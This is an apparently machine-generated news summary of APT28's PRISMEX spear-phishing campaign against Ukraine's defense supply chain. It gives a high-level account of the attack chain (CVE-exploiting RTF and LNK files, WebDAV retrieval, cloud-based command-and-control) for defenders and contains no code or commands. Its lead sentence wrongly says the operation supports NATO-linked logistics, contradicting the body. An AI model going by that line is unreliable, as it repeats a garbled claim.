Ethical Hacking News
Russia-linked APT28 has deployed a sophisticated new malware suite called PRISMEX to infiltrate Ukraine's defense supply chain, disrupt operational planning, and support NATO-linked logistics. The operation utilizes advanced stealth techniques such as steganography and COM hijacking, making detection challenging due to the blending of malicious traffic with normal encrypted communications.
APT28, a Russia-linked group, has used PRISMEX malware in spear-phishing campaigns against Ukraine and its allies. The operation employs advanced stealth techniques like steganography and COM hijacking to evade security tools. PRISMEX includes a dropper, loader, and implant based on the Covenant framework for fileless attacks and evasion of modern security tools. The campaign targets Ukraine's defense supply chain, disrupting operational planning and support to NATO-linked logistics. Victims are tricked into opening RTF files containing malicious LNK files that exploit CVE-2026-21509 and CVE-2026-21513 vulnerabilities. The malware uses legitimate cloud services for command-and-control, making detection challenging. APT28's use of PRISMEX highlights their dual-use capabilities for both intelligence gathering and military objectives. Attackers had advanced knowledge of multiple vulnerabilities before public disclosure, suggesting a continuous development cycle. The operation reflects an evolution of the NotDoor ecosystem, expanding capabilities for rapid exploitation and long-term espionage. Organizations in targeted geographic and industry sectors should consider themselves at elevated risk and implement countermeasures immediately.
Russia-linked Advanced Persistent Threat (APT) group, APT28, has recently been detected employing a sophisticated new malware suite called PRISMEX in its spear-phishing campaign against Ukraine and its allies. According to recent reports, the operation began on September 2025 and utilizes advanced stealth techniques such as steganography and COM hijacking to execute the malicious payloads.
The PRISMEX malware suite consists of several components, including a dropper, loader, and implant based on the Covenant framework. This allows for fileless attacks, encrypted command-and-control, and evasion of modern security tools. The operation targets Ukraine's defense supply chain, including allies, transport, and aid networks, with a focus on disrupting the country's operational planning and support to NATO-linked logistics.
The attack chain begins with spear-phishing emails themed around military training, weather alerts, or weapon smuggling. Victims who open the attached RTF file trigger exploitation of CVE-2026-21509, which bypasses security controls and forces the system to connect to an attacker-controlled WebDAV server. This automatically retrieves and executes a malicious LNK file without further user interaction.
The LNK file may then exploit CVE-2026-21513 to bypass browser protections and execute code silently, downloading additional payloads. The malware also utilizes legitimate cloud services for command-and-control, making detection challenging due to the blending of malicious traffic with normal encrypted communications.
Researchers have attributed the operation to APT28, a group known for its highly aggressive tactics and ability to quickly weaponize newly disclosed flaws. The use of PRISMEX highlights the dual-use nature of this campaign, enabling both intelligence gathering and potential disruptive attacks aligned with military objectives.
The timeline of this campaign indicates advanced knowledge of multiple vulnerabilities, including CVE-2026-21509 and CVE-2026-21513, which were publicly disclosed in January 2026. This suggests that Pawn Storm had access to vulnerability details ahead of public disclosure.
Researchers have detailed decoy documents and targeting, such as a malicious Excel file showing realistic decoy content once macros are enabled, including Ukrainian drone inventories, supplier price lists, and military logistics forms. These tactics demonstrate the attackers' ability to create convincing and realistic decoys, making it challenging for defenders to distinguish between legitimate and malicious content.
The operation reflects an evolution of the NotDoor ecosystem, expanding capabilities for rapid exploitation and long-term espionage. The use of PRISMEX highlights the threat actor's continuous development cycle and modular approach to capability building.
In light of this operation, organizations in the targeted geographic and industry sectors should consider themselves at elevated risk and implement countermeasures immediately. Defenders must adopt an "assume breach" mentality and focus on behavioral anomalies rather than just static indicators.
Related Information:
https://www.ethicalhackingnews.com/articles/Russia-Linked-APT28-Deploys-Advanced-PRISMEX-Malware-to-Infiltrate-Ukraine-and-Allied-Infrastructure-ehn.shtml
https://securityaffairs.com/190510/apt/russia-linked-apt28-uses-prismex-to-infiltrate-ukraine-and-allied-infrastructure-with-advanced-tactics.html
https://undercodenews.com/russias-shadow-cyber-war-escalates-apt28-unleashes-stealthy-prismex-malware-campaign-across-europe/
https://thehackernews.com/search/label/APT28
https://attack.mitre.org/groups/G0007/
https://www.picussecurity.com/resource/blog/apt28-cyber-threat-profile-and-detailed-ttps
Published: Wed Apr 8 16:58:15 2026 by llama3.2 3B Q4_K_M
